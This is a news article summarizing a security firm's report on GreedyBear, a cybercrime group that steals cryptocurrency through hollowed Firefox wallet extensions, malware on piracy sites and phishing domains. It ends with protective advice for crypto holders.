A sophisticated Russian cybercrime group known as GreedyBear has intensified its attacks on the cryptocurrency community, leveraging a multi-pronged strategy of malicious browser extensions, fake wallet software, and phishing websites to execute theft on an industrial scale.
According to a recent report from cybersecurity firm Koi Security, the group has stolen over $1 million worth of cryptocurrency in just over five weeks. This latest wave of attacks reflects both the growing professionalization of cybercriminal networks and the vulnerabilities that remain in the crypto ecosystem.
Weaponizing the Browser: Malicious Firefox Extensions
At the center of GreedyBear’s latest operation is a highly effective scheme involving 150 weaponized Firefox extensions. These malicious add-ons are disguised as legitimate versions of popular crypto wallets, including MetaMask, Exodus, Rabby Wallet, and TronLink.
The attack technique, known as Extension Hollowing, allows GreedyBear to bypass standard security checks on browser marketplaces. Initially, they upload a clean, non-malicious version of the extension, earning user trust and positive reviews. Once approved and downloaded by unsuspecting users, the extension is silently updated with malicious code that steals wallet credentials.
These stolen keys are then used to drain funds from victims’ accounts, often within minutes. Koi Security notes that this method alone accounted for the majority of the $1 million stolen in the recent campaign.
Scaling Up the Operation
The scale of this campaign marks a dramatic expansion from earlier efforts. Between April and July 2025, GreedyBear had deployed only 40 malicious extensions. The latest offensive has tripled that number, reflecting a rapid scaling of resources and operational capability.
Cybersecurity experts believe the increased success rate has emboldened the group, prompting them to target more global and English-speaking audiences through the Firefox attack vector, while reserving other tactics for Russian-speaking users.
Beyond the Browser: Malicious Executables and Phishing
While the fake wallet extensions are the most lucrative tactic, they are not the only weapon in GreedyBear’s arsenal. The group has also deployed nearly 500 malicious Windows executables, strategically placed on Russian websites offering pirated or repacked software.
These executables include credential stealers, ransomware payloads, and trojan malware, forming part of a broader distribution network capable of shifting tactics depending on the target. Once installed, these programs can capture everything from email passwords to private crypto wallet keys.
The phishing component of the campaign is equally sophisticated. GreedyBear operates dozens of convincing fake websites that impersonate legitimate crypto services — from hardware wallet manufacturers to wallet recovery tools. Victims are lured into entering sensitive information, believing they are dealing with a trusted provider, only to have their data siphoned off for theft.
Centralized Coordination Behind the Scenes
Perhaps the most striking detail uncovered by Koi Security is that nearly all domains and attack vectors trace back to a single IP address: 185.208.156.66. This centralized infrastructure suggests tight operational control rather than a loosely connected network of actors.
According to Koi CTO Idan Dardikman, this level of centralization is atypical for state-sponsored campaigns, which often use distributed networks to avoid detection. The evidence points toward an organized cybercrime group operating purely for profit.
Global vs. Local Targeting Strategy
Interestingly, Koi Security’s analysis reveals that GreedyBear adapts its tools based on the target demographic. The Firefox-based fake wallet attacks are aimed at a broader international audience, particularly English-speaking users, while the malicious executable files are primarily pushed toward Russian-speaking victims through regional piracy sites.
This segmentation increases their effectiveness by tailoring the delivery method and language to the intended target, making the attacks harder to spot.
Security Recommendations for Crypto Holders
In response to the growing threat, cybersecurity experts and Koi Security have issued practical recommendations for crypto users:
Only install browser extensions from verified developers with a long history of updates and positive feedback. Avoid pirated software websites, as these are often seeded with malware. Prefer official wallet software from trusted sources rather than browser extensions. Use hardware wallets for storing large amounts of cryptocurrency, purchased directly from the manufacturer’s website. Be skeptical of unsolicited wallet repair or recovery services, as many are elaborate phishing schemes.
Dardikman further emphasized that serious long-term investors should move away from software wallets entirely, citing the relative security of hardware devices when acquired from legitimate vendors.
Why GreedyBear’s Attacks Are So Effective
The success of GreedyBear’s campaign highlights key weaknesses in the cryptocurrency ecosystem:
Trust in Brand Recognition – Users often assume that if a wallet’s name appears on a marketplace, it is legitimate. Overreliance on Browser Extensions – Extensions provide convenience but are more vulnerable to malicious updates. Low User Awareness – Many crypto holders underestimate the sophistication of phishing and malware campaigns.
The combination of these factors allows criminal groups to steal significant amounts with relatively low operational costs.
Looking Ahead: A Persistent Threat
GreedyBear’s rapid scaling over the past few months suggests that the group has both the resources and the motivation to continue refining its tactics. Unless platform security measures and user awareness improve, similar campaigns are likely to target crypto investors worldwide.
With millions in crypto stolen in weeks and a clear blueprint for expansion, GreedyBear exemplifies the evolving nature of cybercrime in the blockchain era — efficient, adaptive, and ruthlessly profit-driven.
